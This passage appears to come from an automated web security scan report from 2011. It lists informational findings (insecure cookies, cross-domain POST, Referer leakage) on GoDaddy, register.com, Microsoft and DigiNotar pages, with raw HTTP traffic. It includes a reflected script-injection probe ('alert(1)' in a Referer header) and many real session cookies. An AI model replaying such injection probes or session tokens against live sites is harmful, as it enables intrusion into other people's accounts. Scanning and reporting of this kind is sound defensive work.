Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; domainYardVal=%2D1; serverVersion=A; preferences1=_sid=yishkaeegbnbqewgxixgkfpfeekbejsf&dataCenterCode=US&gdshop_currencyType=USD; BlueLithium_ssl=hbuftbbciczbydeibifgffggtihijizc; pathway=4f057259-4645-4223-96aa-98d6262a1c68; ASPSESSIONIDAATRCSST=DCJFEOKAIBECOFPMMBGNKPKK; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pagecount=2; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; ShopperId1=oemhlbvbcgufsjahmchddfndphwizcii; adc1=US; currency1=potableSourceStr=USD; traffic=

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
Set-Cookie: traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=7d1fda4c-9d74-4f27-a00c-1c0b4f42cf16&referringdomain=&split=13; domain=godaddy.com; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 04 Sep 2011 00:31:48 GMT
Content-Length: 27335

popUpFill({"Html":"\r\n\r\n\u003cscript src=\"http://img3.wsimg.com/fos/script/sales_tabs12.min.js\" type=\"text/javascript\"\u003e\u003c/script\u003e\r\n \r\n\r\n \u003ctable id=\"video_trigger\" ce
...[SNIP]...
03e\u003c/tr\u003e\u003c/table\u003e\r\n\r\n\u003cimg src=\"http://img.godaddy.com/image.aspx?sitename=www.godaddy.com&server=M1PWCORPWEB101&shopper=46215684&privatelabelid=1&isc=%22&status=200&rand=0.884129265734986&page=%2fshared%2fvideo%2fvideos.aspx&ci=22398&split=13&querystring=ci%3d22398%26show_vid%3daffiliatesproductoverview%26pagetype%3daffiliate%26callback%3dpopUpFill%26targetDivId%3dquickTourDiv%26popUpFill%3djsonp1315095995209%26_%3d1315096014458%2526hpGoogleStatic%253d1\" alt=\"\" class=\"traffic\" /\u003e\r\n","TargetDivID":"quickTourDiv","Data":null})

14.9. http://www.microsoft-careers.com/model/remote/remoteTrackingManager.cfc previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.microsoft-careers.com
Path:	/model/remote/remoteTrackingManager.cfc

Request 1

Response 1

Request 2

GET /model/remote/remoteTrackingManager.cfc?_=1315055374751&method=trackPage&returnFormat=json&referrer=http%3A%2F%2Fmicrosoftcambridge.com%2FWorking%2FJobs%2Ftabid%2F145%2FDefault.aspx&saveurl=%2Fjob%2FCambridge-SDE-2C-Senior-763405-Job-MA-02138%2F1388917%2F%3Futm_source%3DJ2WRSS%26utm_medium%3Drss%26utm_campaign%3DNERD&type=jobid&data=1388917 HTTP/1.1
Host: www.microsoft-careers.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=PWZKZXS192.168.50.232CKOUJ; CFID=40795863; CFTOKEN=90534017; JSESSIONID=7c305511ba2da977588c595e786a4e14f156; BROWSERTYPE=standard; PREFERREDBROWSER=standard; COOKIECHECK=10; TCPASSWORD=; EMAIL=; USERID=11; REMEMBERME=; __utma=222260868.1458567656.1315055374.1315055374.1315055374.1; __utmb=222260868.2.10.1315055374; __utmc=222260868; __utmz=222260868.1315055374.1.1.utmcsr=J2WRSS|utmccn=NERD|utmcmd=rss

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sat, 03 Sep 2011 13:09:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: J2WRMPSitesVM2
X-Powered-By: ASP.NET
Set-Cookie: REFERRERSTRING=http%3A%2F%2Fmicrosoftcambridge%2Ecom%2FWorking%2FJobs%2Ftabid%2F145%2FDefault%2Easpx;path=/
Set-Cookie: LANDINGPAGE=;path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8

{"SUCCESS":true}

14.10. http://www.register.com/unauthenticated_session_expired.rcmx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.register.com
Path:	/unauthenticated_session_expired.rcmx

Request 1

GET /unauthenticated_session_expired.rcmx?opener=/favicon.icod8565 HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.register.com/favicon.icod8565%22%3balert(1)//1bdb2705792
Cookie: TSfd06f3=a2fcf28a8e5083ca3e0388df23f166bb01a75911468e3f0e4e629f52286023f2a5f6f62c948e24c6bb42c46baef45b0f14e6f57f2fa29a6eab649bb360ac0ec52844c82e16f670b9423cfffa60ac0ec52844c82e; TLTSID=E7F82DE2D67410D60DB8F7326230B644; JSESSIONID=FC623F2DB25506910A73E866C7ED4DCB.janus-production; mbox=session#1315085812182-148030#1315088065|PC#1315085812182-148030.19#1317678205|check#true#1315086264; OAX=Mhd7ak5indMAAU0C; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27314EEA851D16B0-40000133C00812A6[CE]; __utma=195431987.612662728.1315085822.1315085822.1315085822.1; __utmb=195431987.6.10.1315085822; __utmc=195431987; __utmz=195431987.1315085822.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085841752; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085841752|ABID=670543778; R=rcomCookieTS&2011-09-03/17.37.21&trkid&SEO000000000W&

Response 1

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 22:11:56 GMT
HostName: atleuapp02.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 23261
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
.com";s.events="";s.purchaseID="";var prod="";s.products=prod.replace(/\$/g,'');s.eVar1="";s.eVar2="";s.prop3="";s.prop4="";s.prop5="";s.eVar5="";s.prop7="";s.eVar7="";s.prop8="";s.eVar8="";s.refText="http://www.register.com/favicon.icod8565%22%3balert(1)//1bdb2705792";
/*for the T&T integration*/
mboxLoadSCPlugin(s);
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script language="JavaScript" type="text/javascript"></script><noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="https://102.122.2O7.net/b/ss/registercom/1/H.20.3--NS/0"
height="1" width="1" border="0" alt="" /></a></noscript>



<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-7541826-9");
pageTracker._setDomainName(".register.com");
pageTracker._trackPageview();
} catch(err) {}</script>





<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 974081568;
var google_conversion_language = "en";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "VFsmCKDisAIQoJy90AM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/974081568/?label=VFsmCKDisAIQoJy90AM&guid=ON&script=0"/>
</div>
</noscript>
<!-- Google Code for RCOM_Site_Genera
...[SNIP]...

Request 2

GET /unauthenticated_session_expired.rcmx?opener=/favicon.icod8565 HTTP/1.1
Host: www.register.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: TSfd06f3=a2fcf28a8e5083ca3e0388df23f166bb01a75911468e3f0e4e629f52286023f2a5f6f62c948e24c6bb42c46baef45b0f14e6f57f2fa29a6eab649bb360ac0ec52844c82e16f670b9423cfffa60ac0ec52844c82e; TLTSID=E7F82DE2D67410D60DB8F7326230B644; JSESSIONID=FC623F2DB25506910A73E866C7ED4DCB.janus-production; mbox=session#1315085812182-148030#1315088065|PC#1315085812182-148030.19#1317678205|check#true#1315086264; OAX=Mhd7ak5indMAAU0C; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27314EEA851D16B0-40000133C00812A6[CE]; __utma=195431987.612662728.1315085822.1315085822.1315085822.1; __utmb=195431987.6.10.1315085822; __utmc=195431987; __utmz=195431987.1315085822.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; JANUS4X_CUSTOMER_COOKIE=JANUS4.X|CD=1315085841752; JANUS4.X_SESSION_COOKIE=JANUS4.X|CD=1315085841752|ABID=670543778; R=rcomCookieTS&2011-09-03/17.37.21&trkid&SEO000000000W&

Response 2

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 22:12:43 GMT
HostName: atleuapp04.galt.register.com
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
P3P: policyref="http://www.register.com/websitepolicy.xml"
Content-Type: text/html;charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 23194
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content
...[SNIP]...
.com";s.events="";s.purchaseID="";var prod="";s.products=prod.replace(/\$/g,'');s.eVar1="";s.eVar2="";s.prop3="";s.prop4="";s.prop5="";s.eVar5="";s.prop7="";s.eVar7="";s.prop8="";s.eVar8="";s.refText="";
/*for the T&T integration*/
mboxLoadSCPlugin(s);
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script language="JavaScript" type="text/javascript"></script><noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="https://102.122.2O7.net/b/ss/registercom/1/H.20.3--NS/0"
height="1" width="1" border="0" alt="" /></a></noscript>



<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-7541826-9");
pageTracker._setDomainName(".register.com");
pageTracker._trackPageview();
} catch(err) {}</script>





<script type="text/javascript">
/* <![CDATA[ */
var google_conversion_id = 974081568;
var google_conversion_language = "en";
var google_conversion_format = "3";
var google_conversion_color = "666666";
var google_conversion_label = "VFsmCKDisAIQoJy90AM";
var google_conversion_value = 0;
/* ]]> */
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
<noscript>
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/974081568/?label=VFsmCKDisAIQoJy90AM&guid=ON&script=0"/>
</div>
</noscript>

<script type="text/javascript">
/* <!
...[SNIP]...

15. Cross-domain POST previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://frankgruber.me
Path:	/post/9680693152/the-view-looking-out-from-techcocktail-boston-at

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

Request

GET /post/9680693152/the-view-looking-out-from-techcocktail-boston-at HTTP/1.1
Host: frankgruber.me
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Community/CommittedtoCambridge/tabid/338/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

16. SSL cookie without secure flag set previous next
There are 8 instances of this issue:

https://cart.godaddy.com/basket.aspx
https://idp.godaddy.com/login.aspx
https://idp.godaddy.com/retrieveaccount.aspx
https://mya.godaddy.com/
https://mya.godaddy.com/products/accountlist.aspx
https://support.microsoft.com/contactus/emailcontact.aspx
https://www.cheapssls.com/index.php
https://www.diginotar.com/Home/Contact/tabid/2506/Default.aspx

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

16.1. https://cart.godaddy.com/basket.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cart.godaddy.com
Path:	/basket.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

currency1=potableSourceStr=USD311ef78c60812ba60cb9d86e; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:28 GMT; path=/
flag1=cflag=us; domain=godaddy.com; expires=Mon, 03-Sep-2012 21:48:28 GMT; path=/
traffic=cookies=1&referrer=http://www.godaddy.com/gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault&sitename=cart.godaddy.com&page=/basket.aspx&server=M1PWCARTWEB009&status=200 OK&querystring=app_hdr=&piishown=0&shopper=46215871&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=19a7e39c-dcff-40f6-8f6d-e19d0c50259d&split=24&referringdomain=; domain=godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.2. https://idp.godaddy.com/login.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/login.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:30:45 GMT; path=/
flag1=cflag=us; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:30:45 GMT; path=/
traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=ca8f10ab-5a85-4bac-9b43-0ef09fae1617&referringdomain=&split=13; domain=godaddy.com; path=/
traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=ca8f10ab-5a85-4bac-9b43-0ef09fae1617&referringdomain=&split=13; domain=godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.3. https://idp.godaddy.com/retrieveaccount.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://idp.godaddy.com
Path:	/retrieveaccount.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

currency1=potableSourceStr=USD; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:27:41 GMT; path=/
flag1=cflag=us; domain=godaddy.com; expires=Tue, 04-Sep-2012 00:27:41 GMT; path=/
traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=a1743495-9530-4d25-a9ca-bb977519280d&referringdomain=&split=13; domain=godaddy.com; path=/
traffic=cookies=1&referrer=http://www.godaddy.com/affiliates/affiliate-program.aspx&sitename=www.godaddy.com&page=/shared/video/videos.aspx&server=M1PWCORPWEB101&status=200 OK&querystring=ci=22398&show_vid=affiliatesproductoverview&pagetype=affiliate&callback=popUpFill&targetDivId=quickTourDiv&popUpFill=jsonp1315095995209&_=1315096014458%26hpGoogleStatic%3d1&shopper=46215684&privatelabelid=1&isc="&clientip=50.23.123.106&referringpath=a1743495-9530-4d25-a9ca-bb977519280d&referringdomain=&split=13; domain=godaddy.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

16.4. https://mya.godaddy.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mya.godaddy.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ShopperId1=mcjidfagdephnjweyclebfehyathlbaj; domain=godaddy.com; expires=Sat, 04-Sep-2021 00:28:34 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.5. https://mya.godaddy.com/products/accountlist.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://mya.godaddy.com
Path:	/products/accountlist.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ShopperId1=fhvekhlijizajdrfuatbuisjhckdhiwb; domain=godaddy.com; expires=Sat, 04-Sep-2021 00:26:13 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

16.6. https://support.microsoft.com/contactus/emailcontact.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.microsoft.com
Path:	/contactus/emailcontact.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

.ASPXANONYMOUS=WXeuMs-gzAEkAAAAOTI5ZmY5YjUtMzE2MS00MWUyLWI1MzEtZjg0NTAwNTA3NWIzy9s5BXF1LCJadDhta5z9ie3OWSY1; expires=Sat, 12-Nov-2011 00:08:25 GMT; path=/; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contactus/emailcontact.aspx HTTP/1.1
Host: support.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: http://support.microsoft.com/smarterror/default.aspx?spid=global&query=emailcontact%20aspx&errurl=%2fcontactus%2femailcontact.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: .ASPXANONYMOUS=WXeuMs-gzAEkAAAAOTI5ZmY5YjUtMzE2MS00MWUyLWI1MzEtZjg0NTAwNTA3NWIzy9s5BXF1LCJadDhta5z9ie3OWSY1; expires=Sat, 12-Nov-2011 00:08:25 GMT; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ServerName: B06
PICS-Label: (pics-1.1 "http://www.icra.org/pics/vocabularyv03/" l r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0))
Date: Sat, 03 Sep 2011 13:28:25 GMT
Connection: close
Content-Length: 0

16.7. https://www.cheapssls.com/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.cheapssls.com
Path:	/index.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

stat_uniq_code=134386; expires=Sun, 02-Sep-2012 21:48:44 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Connection: keep-alive
Referer: https://www.cheapssls.com/index.php?dispatch=checkout.cart
Content-Length: 485
Origin: https://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.22.9.1315085570462; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; __ar_v4=3NUTGTWFSRFIPAWBFDEMYM%3A20110903%3A6%7CGBRCJV675BABRAPIIGSPD6%3A20110903%3A6%7CTL4HVZJAKBDONOOUY7KOKV%3A20110903%3A6

ve%5Burl%5D=https%3A%2F%2Fwww.cheapssls.com%2Findex.php%3Fdispatch%3Dcheckout.cart&ve%5Btitle%5D=Cart+contents+-+Cheap+SSL+Certificates.+Buy+Trusted+SSL+Certs+from+%248.95%2Fy+%26+Save+Big&ve%5Bbrowse
...[SNIP]...

Response

16.8. https://www.diginotar.com/Home/Contact/tabid/2506/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.diginotar.com
Path:	/Home/Contact/tabid/2506/Default.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

language=en-US; path=/; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Home/Contact/tabid/2506/Default.aspx HTTP/1.1
Host: www.diginotar.com
Connection: keep-alive
Referer: http://www.diginotar.com/Products/Identity/CertiIDManagedPKI/tabid/2246/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=XvkXVfGgzAEkAAAAN2UxY2I2MjUtNmI5ZS00Njc4LWFjODAtYWIyODg2MTVjZTU10; DNNSTUFF_Aggregator=4854=1; language=en-US; __utma=243368080.1326588329.1315071214.1315071214.1315071214.1; __utmb=243368080.6.10.1315071214; __utmc=243368080; __utmz=243368080.1315071214.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=DigiNotar

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 17:37:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en-US; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 53197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-US" lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

17. Cross-domain Referer leakage previous next
There are 61 instances of this issue:

http://assets.tumblr.com/iframe.html
https://careers.microsoft.com/Resumes.aspx
https://cart.godaddy.com/basket.aspx
http://cm.g.doubleclick.net/pixel
http://cm.g.doubleclick.net/pixel
http://dg.specificclick.net/
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
https://idp.godaddy.com/login.aspx
https://idp.godaddy.com/retrieveaccount.aspx
http://mediacdn.disqus.com/1314991730/build/system/disqus.js
http://microsoftcambridge.com/Search/tabid/722/Default.aspx
http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1269119279@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom
http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1483365740@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom
http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1617096016@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom
http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1629838351@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom
http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/index/1911929966@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom
http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/newsessiontimeoutpage/1574699949@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom,Position2,Position3
http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/newsessiontimeoutpage/1717083331@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom,Position2,Position3
http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/viewproductdetail/getadomain/1680914497@Position1,x50,x51,x52,x53,x54,x55,x56,x57,x58,x59,x60,Bottom
http://research.microsoft.com/Search
http://research.microsoft.com/apps/dp/search.aspx
http://research.microsoft.com/apps/pubs/default.aspx
http://research.microsoft.com/apps/search/videosearch.ashx
http://research.microsoft.com/apps/video/default.aspx
http://s7.addthis.com/js/250/addthis_widget.js
https://support.microsoft.com/contactus/emailcontact.aspx
http://vasco.com/company/press_room/news_archive/2011/news_diginotar_reports_security_incident.aspx
http://www.cheapssls.com/
http://www.cheapssls.com/index.php
https://www.cheapssls.com/
https://www.cheapssls.com/index.php
https://www.cheapssls.com/index.php
http://www.diginotar.com/SearchResults/tabid/37/Default.aspx
http://www.godaddy.com/Payment/payment-options.aspx
http://www.godaddy.com/gdshop/offers/cross_sell.asp
http://www.godaddy.com/ssl/ssl-certificates.aspx
http://www.google.com/maps
http://www.google.com/search
http://www.google.com/search
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.google.com/url
http://www.hostnj.net/
http://www.microcad.ca/products/details/McAfee-SafeBoot-Web-Server-SSL-Certificate-with-1-Year-Gold-Support-1-User-1011956760
http://www.microsoft-careers.com/job/Cambridge-SDE-2C-Senior-763405-Job-MA-02138/1388917/
